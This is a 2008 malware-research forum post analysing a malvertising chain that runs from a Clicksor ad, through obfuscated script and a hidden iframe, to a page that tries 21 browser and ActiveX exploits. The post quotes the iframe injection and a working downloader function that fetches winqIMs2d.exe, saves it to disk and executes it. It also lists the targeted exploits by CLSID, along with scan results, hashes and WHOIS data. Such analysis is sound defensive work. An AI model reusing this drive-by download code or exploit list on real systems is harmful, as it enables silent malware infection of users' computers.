B.I.S.S. Forums > winqIMs2d.exe

B.I.S.S. Forums > Malware Research Forum > Malware Playground

Kimberly

Nov 21 2008, 10:22 PM

<h4>

winqIMs2d.exe - load.exe / Clicksor advertising - 21 exploits

</h4>
Clicksor advertising is hitting the malware section (again) tonight. We saw them earlier in exploits featuring xrun.exe - xpre.exe / ya-tracker.com & flashwrite_1_2.js / byronadvertising.eu .... Multiple references (members only)

<h4>

Starting point at Clicksor

</h4>
creative.clicksor.com/network_1/67692/c203377991.html

CODE
<script type="text/javascript" src="http://ads.myadslink.com/ads/random_ads.js"></script></body></html>

<h4>

ads.myadslink.com

</h4>
ads.myadslink.com/ads/random_ads.js - As usual the page contains some obfuscated junk ... whoops Javascript ...

Decoded it leads us to at secure.sessioncheck.net:

CODE
<script language=javascript>
status=location;
window.status="Done";
document.write('<iframe src="http://secure.sessioncheck.net/routine/?ref='+window.location+'" width=0 height=0 frameborder=0 style="display:none; visibility: hidden" onLoad="status=defaultStatus;"></iframe>');
</script>

Note: window.location being your referer header thus the code below in our case.
CODE
http://secure.sessioncheck.net/routine/?ref=http://creative.clicksor.com/network_1/67692/c203377991.html

<h4>

secure.sessioncheck.net or 21 exploits to screw your PC

</h4>

It's rather common to package more than one exploit in malicious JavaScript pages and attempt to run all of them against the victim browser. But hey, what about 21 different exploits in the same script?

CODE
if (
mdac() ||
office() ||
dl() ||
pdf() ||
wme() ||
wfi() ||
com() ||
ya1() ||
ya2() ||
fb() ||
mdss() ||
creative() ||
wks() ||
ogame() ||
ca() ||
buddy() ||
gomweb() ||
xmlcore() ||
quick() ||
real() ||
ntaudio()
) { }

mdac (MS06-014)
BD96C556-65A3-11D0-983A-00C04FC29E36
BD96C556-65A3-11D0-983A-00C04FC29E30
AB9BCEDD-EC7E-47E1-9322-D4A210617116
0006F033-0000-0000-C000-000000000046
0006F03A-0000-0000-C000-000000000046
6e32070a-766d-4ee6-879c-dc1fa91d2fc3
6414512B-B978-451D-A0D8-FCFDF33E833C
7F5B7F63-F06F-4331-8A26-339E03C0AE3D
06723E09-F4C2-43c8-8358-09FCD1DB0766
639F725F-1B2D-4831-A9FD-874847682010
BA018599-1DB3-44f9-83B4-461454C84BF8
D0C07D56-7C69-43F1-B4A0-25F5A11FAB19
E8CCCDDF-CA28-496b-B050-6C07C962476B
WebViewFolder setSlice - WebViewFolderIcon.WebViewFolderIcon.1
CreateControlRange - Microsoft 'msdds.dll' COM Object - EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (MS05-052)
Yahoo! Messenger 8.x ActiveX
DCE2F8B1-A520-11D4-8FD0-00D0B7730277
9D39223E-AE8E-11D4-8FD3-00D0B7730277
FaceBook/Aurigma Image/PhotoUploader Buffer Overflow - 5C6698D9-7BE4-4122-8EC5-291D84DBD4A0
Microsoft Speech API ActiveX - EEE78591-FE22-11D0-8BEF-0060081841DE
Microsoft Office Snapshot Viewer ActiveX - snpvw.Snapshot Viewer Control.1
Sina Downloader.DLoader.1
WksPictureInterface - 00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6
Ourgame IEStartNative - F917534D-535B-416B-8E8F-0C04756C31A8
CA AddColumn - BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3
SuperBuddy LinkSBIcons - Sb.SuperBuddy
GomPlayer OpenURL - GomWebCtrl.GomManager.1
XMLHTTP setRequestHeader - 88d969c5-f192-11d4-a65f-0040963251e5
QuickTime RTSP - QuickTime.QuickTime.4
RealPlayer Console - IERPCtl.IERPCtl.1
NCTAudioFile2 - 77829F14-D911-40FF-A2F0-D11DB8D6D0BC
Creative CacheFolder - 0A5FD7C5-A45C-49FC-ADB5-9952547D5715
collab.CollabEmailInfo - PDF exploit
Windows Media Encoder - A8D3AD02-7508-4004-B2E9-AD33F087F43C
In depth analysis reveals that the mdac exploit is trying to obtain the payload via the XMLHTTP / ADODB object executed by the Shell.Application object.
CODE
function Go(a)
{
   var eurl=url;
   var fname="winqIMs2d.exe";
   var fso=CreateO(a,"Scripting.FileSystemObject")
   var sap=CreateO(a,"Shell.Application");
   var x=CreateO(a,"ADODB.Stream");
   var nl=null;
   fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
   x.Mode=3;
   try
   {
     nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");
     nl.open("GET",eurl,false);
   }
   catch(e)
   {
     try
     {
       nl=CreateO(a,"MSXML2.XMLHTTP");
       nl.open("GET",eurl,false);
     }
     catch(e)
     {
       try
       {
         nl=CreateO(a,"MSXML2.ServerXMLHTTP");
         nl.open("GET",eurl,false);
       }
       catch(e)
       {
         try
         {
           nl=new XMLHttpRequest();
           nl.open("GET",eurl,false);
         }
         catch(e)
         {
           return 0;
         }
       }
     }
   }
   x.Type=1;
   nl.send(null);
   rb=nl.responseBody;
   x.Open();
   x.Write(rb);
   x.SaveTofile(fname,2);
   sap.ShellExecute(fname);
   return 1;
}

<h4>

File details

</h4>

File winqIMs2d.exe received on 11.21.2008 19:19:06 (CET)
AhnLab-V3 2008.11.21.0 2008.11.21 -
AntiVir 7.9.0.35 2008.11.21 DR/Delphi.Gen
Authentium 5.1.0.4 2008.11.21 -
Avast 4.8.1281.0 2008.11.21 Win32:Delf-GNA
AVG 8.0.0.199 2008.11.21 Downloader.Delf.BLD
BitDefender 7.2 2008.11.21 Trojan.Dropper.Delf.Crypt.C
CAT-QuickHeal 10.00 2008.11.21 -
ClamAV 0.94.1 2008.11.21 -
DrWeb 4.44.0.09170 2008.11.21 Trojan.MulDrop.19553
eSafe 7.0.17.0 2008.11.19 -
eTrust-Vet 31.6.6221 2008.11.21 Win32/Injecslen
Ewido 4.0 2008.11.21 -
F-Prot 4.4.4.56 2008.11.21 -
F-Secure 8.0.14332.0 2008.11.21 -
Fortinet 3.117.0.0 2008.11.21 PossibleThreat
GData 19 2008.11.21 Trojan.Dropper.Delf.Crypt.C
Ikarus T3.1.1.45.0 2008.11.21 Win32.SuspectCrc
K7AntiVirus 7.10.530 2008.11.21 Trojan.Win32.Malware.1
Kaspersky 7.0.0.125 2008.11.21 -
McAfee 5440 2008.11.20 -
McAfee+Artemis 5440 2008.11.20 Generic!Artemis
Microsoft 1.4104 2008.11.21 VirTool:Win32/DelfInject.gen!T
NOD32 3631 2008.11.21 -
Norman 5.80.02 2008.11.21 W32/Malware.EMNJ
Panda 9.0.0.4 2008.11.20 -
PCTools 4.4.2.0 2008.11.21 -
Prevx1 V2 2008.11.21 -
Rising 21.04.42.00 2008.11.21 Trojan.Win32.Delf.fix
SecureWeb-Gateway 6.7.6 2008.11.21 Trojan.Dropper.Delphi.Gen
Sophos 4.35.0 2008.11.21 -
Sunbelt 3.1.1823.2 2008.11.21 -
Symantec 10 2008.11.21 -
TheHacker 6.3.1.1.159 2008.11.19 -
TrendMicro 8.700.0.1004 2008.11.21 TROJ_DELF.FPX
VBA32 3.12.8.9 2008.11.20 Trojan-Downloader.Win32.Delf.lre
ViRobot 2008.11.18.1474 2008.11.18 -
VirusBuster 4.5.11.0 2008.11.21 -

Additional information
File size: 60928 bytes
MD5...: 1707857069e97a26cd8d598a84be099c
SHA1..: 3f3b6699a38af01e524679946efdff3931e01ae7
SHA256: 7afadeceea4fd02ffd7e669645c2e0274cfabbfdc1f0cb757db394953e79144e
PEiD..: -
______________________________

File 1.pdf received on 11.21.2008 19:18:08 (CET)
AhnLab-V3 2008.11.21.0 2008.11.21 -
AntiVir 7.9.0.35 2008.11.21 JS/Dldr.Small.CR.2
Authentium 5.1.0.4 2008.11.21 -
Avast 4.8.1281.0 2008.11.21 -
AVG 8.0.0.199 2008.11.21 -
BitDefender 7.2 2008.11.21 Trojan.JS.Downloader.BGI
CAT-QuickHeal 10.00 2008.11.21 -
ClamAV 0.94.1 2008.11.21 -
DrWeb 4.44.0.09170 2008.11.21 Exploit.PDF.4
eSafe 7.0.17.0 2008.11.19 -
eTrust-Vet 31.6.6221 2008.11.21 -
Ewido 4.0 2008.11.21 -
F-Prot 4.4.4.56 2008.11.21 -
F-Secure 8.0.14332.0 2008.11.21 Exploit.JS.Pdfka.w
Fortinet 3.117.0.0 2008.11.21 -
GData 19 2008.11.21 Trojan.JS.Downloader.BGI
Ikarus T3.1.1.45.0 2008.11.21 Exploit.Win32.Pdfjsc.G
K7AntiVirus 7.10.530 2008.11.21 -
Kaspersky 7.0.0.125 2008.11.21 -
McAfee 5440 2008.11.20 Exploit-PDF.f
McAfee+Artemis 5440 2008.11.20 Exploit-PDF.f
Microsoft 1.4104 2008.11.21 Exploit:Win32/Pdfjsc.G
NOD32 3631 2008.11.21 -
Norman 5.80.02 2008.11.21 -
Panda 9.0.0.4 2008.11.20 -
PCTools 4.4.2.0 2008.11.21 -
Prevx1 V2 2008.11.21 -
Rising 21.04.42.00 2008.11.21 -
SecureWeb-Gateway 6.7.6 2008.11.21 Script.Dldr.Small.CR.2
Sophos 4.35.0 2008.11.21 Mal/PDFEx-B
Sunbelt 3.1.1823.2 2008.11.21 -
Symantec 10 2008.11.21 Bloodhound.Exploit.196
TheHacker 6.3.1.1.159 2008.11.19 -
TrendMicro 8.700.0.1004 2008.11.21 -
VBA32 3.12.8.9 2008.11.20 -
ViRobot 2008.11.18.1474 2008.11.18 -
VirusBuster 4.5.11.0 2008.11.21 -

Additional information
File size: 2836 bytes
MD5...: caa6b944c49563d2b5be8b290ed66e37
SHA1..: bbb37815ad46e070fc697f849af2779588904cc8
SHA256: aff3ad344dbe128941fa43eb907ca35dba4b7fddf1459ca368c2f33f16e575bd
PEiD..: -
TrID..: File type identification<BR>Adobe Portable Document Format (100.0%)
PEInfo: -

<h4>

IP details

</h4>
ads.myadslink.com - 72.233.33.210

Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Name Server: NS1.IDNSNET.NET
Name Server: NS2.IDNSNET.NET
Updated Date: 29-oct-2008
Creation Date: 29-oct-2008

Registrant:
Organization : Zhichaoe Fung
Name : Zhichaoe Fung
Address : Nanxixinyuan Rd. 27, No. 3, 1F, Apt. 1903
City : aomentebiexingzhengqu
Province/State : aomentebiexingzhengqu
Country : aomentebiexingzhengqu
Postal Code : 200000
______________________________

secure.sessioncheck.net - 72.233.33.210

Registrar: CHEAPIES.COM INC.
Whois Server: whois.cheapies.com
Name Server: NS1.IDNSNET.NET
Name Server: NS2.IDNSNET.NET
Updated Date: 22-oct-2008
Creation Date: 22-oct-2008

Registered at Cheapies.Com
Privacy Domain
599-B Yonge St #511
Toronto, ON
M4Y 1Z4
Canada
Tel: 1.8667077633
Fax: 1.4169461794
Email: privacy@cheapies.com

Still lovin' JavaScript and all the Web Browser Add-Ons?

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.